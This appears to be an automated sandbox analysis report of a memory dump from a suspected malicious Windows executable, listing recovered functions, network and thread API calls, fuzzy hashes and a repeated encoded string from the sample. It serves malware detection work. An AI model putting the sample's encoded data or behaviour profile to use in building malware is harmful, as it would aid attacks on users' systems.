/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040BF50, 0040BF5D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 5944bcc47d6a98b0c47807870ceaf44e65103c9e3b01472220e27fccf25ad1b9
Instruction ID: 3436170ea041aa1e5de0fee85609c1d8a8328f22e981a0665eda8f3eee515125
Opcode Fuzzy Hash: 5944bcc47d6a98b0c47807870ceaf44e65103c9e3b01472220e27fccf25ad1b9
Instruction Fuzzy Hash: 74C04C22999A302D3D4533A97C07DEA028E8D56730B16017FB541656D65D882C8185FE

Uniqueness

Uniqueness Score: -1.00%

Function 00403F53, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00403F5A

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403F54, 00403F59, 00403F61

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: 252dfb28195306d9e35328a9abcc698d4414b4d857519e356838c6672b790567
Instruction ID: c9f98c8cbfcdd9fab2be9cf57d1fce3192d82ac0d695ce3633eb1dbab1b9471e
Opcode Fuzzy Hash: 252dfb28195306d9e35328a9abcc698d4414b4d857519e356838c6672b790567
Instruction Fuzzy Hash: D2C04C125956302D399532993C07DEE024E9D56720B56016FF544655D25C891C81C1FE

Uniqueness

Uniqueness Score: -1.00%

Function 0041CECB, Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041CF30
__Thrd_sleep.LIBCPMT ref: 0041CF5E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Thrd_sleepUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2189147043-0
Opcode ID: 6ef084d886536efa36fb08816f2cde13a72646d32545107b0f6acc4ccb184032
Instruction ID: a5553f93fda0dbafcf3dd2cc12bc55a76eae7f1fe9668aa702ce21b3fda4d9d8
Opcode Fuzzy Hash: 6ef084d886536efa36fb08816f2cde13a72646d32545107b0f6acc4ccb184032
Instruction Fuzzy Hash: EC1157325043109BD310EF698C81B57BFE9EFC9754F08462EB908BA151E6749980878A

Uniqueness

Uniqueness Score: -1.00%

Function 004255F7, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: 8f4fab0dbd3d0f3dd64605a743e94dc0990d926ea59712ec9a4684316ceaeb30
Instruction ID: 491d5e8be5114f4b240bc796e7f9e851366441774ff87c07463e96f67409059d
Opcode Fuzzy Hash: 8f4fab0dbd3d0f3dd64605a743e94dc0990d926ea59712ec9a4684316ceaeb30
Instruction Fuzzy Hash: 8A11E171300519BBDB218E54EC4AFAA7B65EF14324FD04106FA19862E0C77CDC61DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004219C9, Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004219CE
new.LIBCMT ref: 004219EB

Part of subcall function 00421976: __EH_prolog.LIBCMT ref: 0042197B
Part of subcall function 00421976: __Getctype.LIBCPMT ref: 004219A1

Part of subcall function 00421059: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00421081
Part of subcall function 00421059: std::_Lockit::~_Lockit.LIBCPMT ref: 0042110D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologstd::_$GetctypeLocinfo::_Locinfo_dtorLockitLockit::~_
String ID:
API String ID: 4122330132-0
Opcode ID: b1b090d675cc00cb21eca32efbf5c1ae8e7c5696a35b0b42d348e107ef4bd08d
Instruction ID: fbde2bd1481ce7c7b2cb5b6156cb7aef1863e66f145bda6bb614e2272a6a618c
Opcode Fuzzy Hash: b1b090d675cc00cb21eca32efbf5c1ae8e7c5696a35b0b42d348e107ef4bd08d
Instruction Fuzzy Hash: 3201C4B1A00229ABCB10EFA9E8817DEFB75FF64320F60422FE419A7291D7740A00C794

Uniqueness

Uniqueness Score: -1.00%

Function 00414D9D, Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

CreateIoCompletionPort.KERNELBASE(?,?,00000000,00000000), ref: 00414DB0
GetLastError.KERNEL32 ref: 00414DBA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CompletionCreateErrorLastPort
String ID:
API String ID: 826170474-0
Opcode ID: 0395236f40c99d132699d23732010481dfda0b7b115359d0289d3860ae94fd5e
Instruction ID: 3ef129dfe6b8358e7d9be018ffa25797f26216bf5c787367d69216dd716af2eb
Opcode Fuzzy Hash: 0395236f40c99d132699d23732010481dfda0b7b115359d0289d3860ae94fd5e
Instruction Fuzzy Hash: B8016771A0060CAF8B11DFA9988059FBBA6EE45394714807AFC05E7211D6758E068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 006A10DC, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006A10FD

Part of subcall function 006A108E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0

RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,006A336A,?,00000004,00000000,?,?,?,006A5BE9,?,00000000), ref: 006A1139

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 82856c9a945a5109aee5276d69ee04f10a8b6d03164f0c80b4fa7489bd98f00a
Instruction ID: c5cbd700ae049f8d96cd2395215c452c62e4477a8341e6aedb05efd4ec93b030
Opcode Fuzzy Hash: 82856c9a945a5109aee5276d69ee04f10a8b6d03164f0c80b4fa7489bd98f00a
Instruction Fuzzy Hash: F9F0F632A0021566DB717A21AC41BAB776B9FD3772F14411DFA289F291DE30DC418DB5

Uniqueness

Uniqueness Score: -1.00%

Function 005CD610, Relevance: 3.0, APIs: 2, Instructions: 41threadCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,004B1F18), ref: 005CD651
ResumeThread.KERNELBASE(?,?,?,?,?,?,00000000,004B1F18), ref: 005CD65F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandleResumeThread
String ID:
API String ID: 3265327148-0
Opcode ID: e99e54739331bc2e4732d1c47c4a758e94cd102262b56a60454605a2fff59f2b
Instruction ID: f0b4d82a862ce52bc9d00719d9f04750367e6593c9f3305768fec72d78e3c51c
Opcode Fuzzy Hash: e99e54739331bc2e4732d1c47c4a758e94cd102262b56a60454605a2fff59f2b
Instruction Fuzzy Hash: FFF04F712002019FDB109F99DCC5F56B7B8BF44325B14006AF919CB2A1E7B0A8D2DA64

Uniqueness

Uniqueness Score: -1.00%

Function 00415A23, Relevance: 3.0, APIs: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415A36
setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00415A69

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Socketsetsockopt
String ID:
API String ID: 4073417641-0
Opcode ID: 3b90072e8cb81b3ca05c6826c9d39db1d776a69f4c37158aedfab5e15434e4a0
Instruction ID: 663e49da4d4856ef2d3da6e005abff95531b9732195f4b7834f121d04bb2196b
Opcode Fuzzy Hash: 3b90072e8cb81b3ca05c6826c9d39db1d776a69f4c37158aedfab5e15434e4a0
Instruction Fuzzy Hash: 57F0B43A690218BBE63056188C8AFEE7659CB89B70F104316FE21A62C096F45D414195

Uniqueness

Uniqueness Score: -1.00%

Function 0040F48D, Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9d6a7a2a6c329b8c658a31af58da615f691074d5fde15becd13cb46ea05feb
Instruction ID: 3225706cb2ef8621140827d6974cb5288cc4a64a16b81056c02bd44edeb2d36d
Opcode Fuzzy Hash: 5f9d6a7a2a6c329b8c658a31af58da615f691074d5fde15becd13cb46ea05feb
Instruction Fuzzy Hash: 1BF0E2712142055ACB2CDB78985567B3B469F64324B208B3FFD2ADA9C0D739DD88830C

Uniqueness

Uniqueness Score: -1.00%

Function 00413F49, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

__Thrd_start.LIBCPMT ref: 00413F58

Part of subcall function 00582E5D: std::_Throw_Cpp_error.LIBCPMT ref: 00582E84

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cpp_errorThrd_startThrow_std::_
String ID:
API String ID: 1816819587-0
Opcode ID: 482491daaff7d305f77c0e5da6f056b282fd6e02cfe2d2002e2a29a61db142d5
Instruction ID: 001f3e7be6932ec7b589c578a32a9158c350cf8eb1f041a732ff9f2af810380e
Opcode Fuzzy Hash: 482491daaff7d305f77c0e5da6f056b282fd6e02cfe2d2002e2a29a61db142d5
Instruction Fuzzy Hash: E5E0D8319582117AEF1D2A259C07DE77E989F00B21B10847FF84A50461E95AEED24648

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2A2, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041F2A7
new.LIBCMT ref: 0041F2B0

Part of subcall function 0041F2D9: __EH_prolog.LIBCMT ref: 0041F2DE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6ebccf465f2068dae9db6c70872b754fe6c16c801c080b51acb93c81b5b83211
Instruction ID: 65a7a105255d853fcf43c732abe7d01ce016bef1e48f124c7a29f914fb7d0582
Opcode Fuzzy Hash: 6ebccf465f2068dae9db6c70872b754fe6c16c801c080b51acb93c81b5b83211
Instruction Fuzzy Hash: 14E0C270A40208ABDF18EFA8D8067BEBFB2EF40320F0083ADB815562C2DB790F408754

Uniqueness

Uniqueness Score: -1.00%

Function 00416319, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041631E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a7c11de10b17c89fc47b0469581b3710ff41b2bdb42303edd2173ccc73ffcf01
Instruction ID: bc131b28d82ea61ad7cf9e497848dc32f686f21abaa468e28f58667315e49527
Opcode Fuzzy Hash: a7c11de10b17c89fc47b0469581b3710ff41b2bdb42303edd2173ccc73ffcf01
Instruction Fuzzy Hash: D9319C3290450D9BCF10DF68C4416EEBBB1AF45324F11820EFC796B291C779AA96DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004121EC, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004121F1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6ae42aed0ee5865e9ac6e9b72ef8fd11d8e97bc0a662be2d503da85f077f0062
Instruction ID: 106f691d2cd4d388acc72c086b2a8801f6c7c68005dff5bca8a06f5e902c6d40
Opcode Fuzzy Hash: 6ae42aed0ee5865e9ac6e9b72ef8fd11d8e97bc0a662be2d503da85f077f0062
Instruction Fuzzy Hash: DE213771E042049BDB24CFA8DA407EEB7B1EF44720F10066EE821A73C0C3B46995C799

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC3F, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EC44

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 880b6969641372ef97a1c37eb609abc5c85798ce273f4fe36591dd4312caa178
Instruction ID: 54ad5f8fa5d8eb183162b415b7c6747980d5435cbff71c2e7f2fa9c717b49fd3
Opcode Fuzzy Hash: 880b6969641372ef97a1c37eb609abc5c85798ce273f4fe36591dd4312caa178
Instruction Fuzzy Hash: E3310FB1905208DFCB14DFA9C5859DEBBF8FF08320F20826EE559E7291D7349A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7DC, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041E7E1

Part of subcall function 0041EC3F: __EH_prolog.LIBCMT ref: 0041EC44

Part of subcall function 0041B39F: __EH_prolog.LIBCMT ref: 0041B3A4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 69d80c1fab76551441c165aa58aeb84fe836f82ef7023ae4cb88200c85a04a33
Instruction ID: 7e035398976a704261069b36eb36525f1a1acefc23991192ddd41c782832667d
Opcode Fuzzy Hash: 69d80c1fab76551441c165aa58aeb84fe836f82ef7023ae4cb88200c85a04a33
Instruction Fuzzy Hash: CF316B71A00748DFDB24EF76C445BEEBBA5EF44314F00881EE5AA87281DB782A45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00415A77, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,?,?,00000004), ref: 00415B03

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 229b2676438b68199630548ea13f135a547bc85ac154036ae7c02f03ae255c6f
Instruction ID: ee03ee346e80de96060b2f7dc48de22909011d28722b388b5a7a22666c16ff3a
Opcode Fuzzy Hash: 229b2676438b68199630548ea13f135a547bc85ac154036ae7c02f03ae255c6f
Instruction Fuzzy Hash: B011EF31644A17DBCF218E54C8806EB7B60AF853A1F108327F9689B2C0C778ECD187CA

Uniqueness

Uniqueness Score: -1.00%

Function 004145F9, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,?,?,00000000,006BAEF1,000000FF,?,Service already exists.), ref: 00414659

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: 6f4d3e7916f3d164ac65eabb8666ad30ca657fc5a6c65d226d117f5f04071ff2
Instruction ID: c205b92e4670c4d4a9239502f0aa17f7a91c955e2e12e1d5caf8899e845fa433
Opcode Fuzzy Hash: 6f4d3e7916f3d164ac65eabb8666ad30ca657fc5a6c65d226d117f5f04071ff2
Instruction Fuzzy Hash: E511CE32600B10DFC724CF08D844B9AB7A4EF4AB20F15025EE91597780CB38AC418B88

Uniqueness

Uniqueness Score: -1.00%

Function 004158E1, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 004158F9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 844c422e5eb378a7e0d29b4a214563c5546f25862673e465dbfc040dc78f2f9b
Instruction ID: 9da11206683b960042a778e75a57ea9168890d1a14d1c1e5e2c37e50e1839dcd
Opcode Fuzzy Hash: 844c422e5eb378a7e0d29b4a214563c5546f25862673e465dbfc040dc78f2f9b
Instruction Fuzzy Hash: 69012FF0A00208FFDB209F61C8808EAB76CEB84374B10022BF80593380C738AD508796

Uniqueness

Uniqueness Score: -1.00%

Function 004AC8DD, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AC8E2

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f42449693ef1a47b6df4a5e2534d95c0e25e22352c546430f63f561eba1047ef
Instruction ID: c14727fb24beb689e6f6779a32a4015c6038887e017dff5ea0652d04006fa9ed
Opcode Fuzzy Hash: f42449693ef1a47b6df4a5e2534d95c0e25e22352c546430f63f561eba1047ef
Instruction Fuzzy Hash: F8115771A01249CFCB61DF58C904B9ABBF5FF08314F1085AEE8988B351D3B19A40CB80

Uniqueness

Uniqueness Score: -1.00%

Function 006A06C2, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,006A9F0D,00000001,00000364,?,00694D4A,00787350,00000010), ref: 006A0703

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3c23660a21ad2e462de00a57121c1483a83682750325c3113940d13b4d1180a9
Instruction ID: 7e934bd5066ccc049f0f0c22338a0c4756a715c0b7e1c58434b19cc306e23a6d
Opcode Fuzzy Hash: 3c23660a21ad2e462de00a57121c1483a83682750325c3113940d13b4d1180a9
Instruction Fuzzy Hash: BDF0E931248624A7FF21BE619C05B9B375FAF837B0F145111F8099A690CA31EC118EE5

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF6B, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CF70

Part of subcall function 0041EE30: __EH_prolog.LIBCMT ref: 0041EE35

Part of subcall function 0041E7DC: __EH_prolog.LIBCMT ref: 0041E7E1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d41f1522d6369eec75bdb53f6a55bbd161640743663369d0d822af88bb528957
Instruction ID: 1cbb4bd097007db9c2494b7392ff96814d6381db4e84be9cf20203a5681cf52e
Opcode Fuzzy Hash: d41f1522d6369eec75bdb53f6a55bbd161640743663369d0d822af88bb528957
Instruction Fuzzy Hash: C0017C71A01108EFCB04EFA9C905AEEFBB9FF54314F10415EE805A7291CB749A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00411BC8, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00411BF8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: c4203deebfaa98b4ce69c341a0df00799c8a05dc99801bc6bf8704e2da5dc8a7
Instruction ID: fbdd84b15743c9219d8a27b68931acf2a1371eda055d287936f063f92b30fc3d
Opcode Fuzzy Hash: c4203deebfaa98b4ce69c341a0df00799c8a05dc99801bc6bf8704e2da5dc8a7
Instruction Fuzzy Hash: 49F0F6754007009AD7308F08A940B53F7ECEF85714F14092EEA8513611D375F98487E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B39F, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041B3A4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7e26deef796c43126ed51a1ca2e52b3206a359ae88f02c4dd00738d47b6216a6
Instruction ID: 654992942dd4846e25231714a87aaac56a84a338c220e369bb60f0fbff998924
Opcode Fuzzy Hash: 7e26deef796c43126ed51a1ca2e52b3206a359ae88f02c4dd00738d47b6216a6
Instruction Fuzzy Hash: DBF06DF1D15219ABC7109F59C98199BFFBDFF58760B10821BB81893241D7B15E20CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 006A108E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6b22095144da70cbec31f193c9388207d853bd3e62e9af16367f76d79eb0748f
Instruction ID: 057aafb766249f32bd5b599ce166dd7925d9ac491e62c583bfb90a4e987c2369
Opcode Fuzzy Hash: 6b22095144da70cbec31f193c9388207d853bd3e62e9af16367f76d79eb0748f
Instruction Fuzzy Hash: 31E030251452A196EA7136659D04B9B3A9B9F433F0F150110A8459F292DE64AC818EB6

Uniqueness

Uniqueness Score: -1.00%

Function 004AF07A, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 004227D5: new.LIBCMT ref: 0042280B
Part of subcall function 004227D5: std::locale::_Init.LIBCPMT ref: 00422815

Part of subcall function 004AFD21: __EH_prolog.LIBCMT ref: 004AFD26

std::ios_base::_Addstd.LIBCPMT ref: 004AF0B9

Part of subcall function 004226AE: __EH_prolog.LIBCMT ref: 004226B3
Part of subcall function 004226AE: __CxxThrowException@8.LIBVCRUNTIME ref: 004226D9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddstdException@8InitThrowstd::ios_base::_std::locale::_
String ID:
API String ID: 2564750599-0
Opcode ID: 3d901c01a1426a53dd42f28859e6fb9d9d7944a74d665e030c051e79394bef60
Instruction ID: 7018a0c775b5a882920073ae86af83c4afe5ed78168e96d6e9dcefd3a99bd23a
Opcode Fuzzy Hash: 3d901c01a1426a53dd42f28859e6fb9d9d7944a74d665e030c051e79394bef60
Instruction Fuzzy Hash: B2F0EC326043146BE734A6B59449B5B7BD4AF11334F00441FF48257A82DAF9F4448B95

Uniqueness

Uniqueness Score: -1.00%

Function 004AFD21, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AFD26

Part of subcall function 00422763: __EH_prolog.LIBCMT ref: 00422768

Part of subcall function 004B02E0: __EH_prolog.LIBCMT ref: 004B02E5
Part of subcall function 004B02E0: std::_Lockit::_Lockit.LIBCPMT ref: 004B02F4
Part of subcall function 004B02E0: std::locale::_Getfacet.LIBCPMT ref: 004B0314
Part of subcall function 004B02E0: std::_Lockit::~_Lockit.LIBCPMT ref: 004B036E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Lockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3055501177-0
Opcode ID: c1d3582962254c774d239df827e698910983ea97e75e998fbf88abde84892987
Instruction ID: ca78f803e55544c0ed65db2b3ac897056a71d1f714b11054642c2cd8e851af7c
Opcode Fuzzy Hash: c1d3582962254c774d239df827e698910983ea97e75e998fbf88abde84892987
Instruction Fuzzy Hash: 1FE06CB1900118EBCB18EFA4D94AAEEB779EF54311F10425EF415A3192D7345E01C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 0041569D, Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,?), ref: 004156BD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: f08251cb2a754f7f2434fc7b6e2151aa4a8a2ff67c4da2180d2909c61758b2f6
Instruction ID: 94b5bfe2314bff8fdf9ce2e0ce22ba35234059b5c56646d24ec5b8d3069aba9e
Opcode Fuzzy Hash: f08251cb2a754f7f2434fc7b6e2151aa4a8a2ff67c4da2180d2909c61758b2f6
Instruction Fuzzy Hash: 89E08631601914678A1066B86C518E9775A8F80B79B04C716BE3D4B7D0CA35DC9096D4

Uniqueness

Uniqueness Score: -1.00%

Function 00434FEC, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00434FF1

Part of subcall function 0041369B: __EH_prolog.LIBCMT ref: 004136A0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d886ce0dca7cabb51cc6dc78e2b46fa8716ba0fa1f3bf03dbec5e83667a22732
Instruction ID: a6a17074417603aca11d58167767c08cca39a4181a89d4965a13cf8e3d3d3d66
Opcode Fuzzy Hash: d886ce0dca7cabb51cc6dc78e2b46fa8716ba0fa1f3bf03dbec5e83667a22732
Instruction Fuzzy Hash: 09F030B0C1025899CB10EFE9D8452EEBEB8AF19744F10500FF404B3251D7B80745CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB4D, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EB52

Part of subcall function 00413F8D: std::_Cnd_initX.LIBCPMT ref: 00413F93
Part of subcall function 00413F8D: __Cnd_signal.LIBCPMT ref: 00413F9F
Part of subcall function 00413F8D: std::_Cnd_initX.LIBCPMT ref: 00413FB4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cnd_initstd::_$Cnd_signalH_prolog
String ID:
API String ID: 3262714529-0
Opcode ID: a0b7cdb32420671739376e3ae0d5ff04c888879c3c69182ce2df5e1bfc88edac
Instruction ID: 6ec64e20ddbb1a917344458e8d6a88660199dbb73029c05b273ebe62639c58e9
Opcode Fuzzy Hash: a0b7cdb32420671739376e3ae0d5ff04c888879c3c69182ce2df5e1bfc88edac
Instruction Fuzzy Hash: 96E01271955214DBDB18AF9494067DDB7B4EF04335F20078EF494662C2CB7556028799

Uniqueness

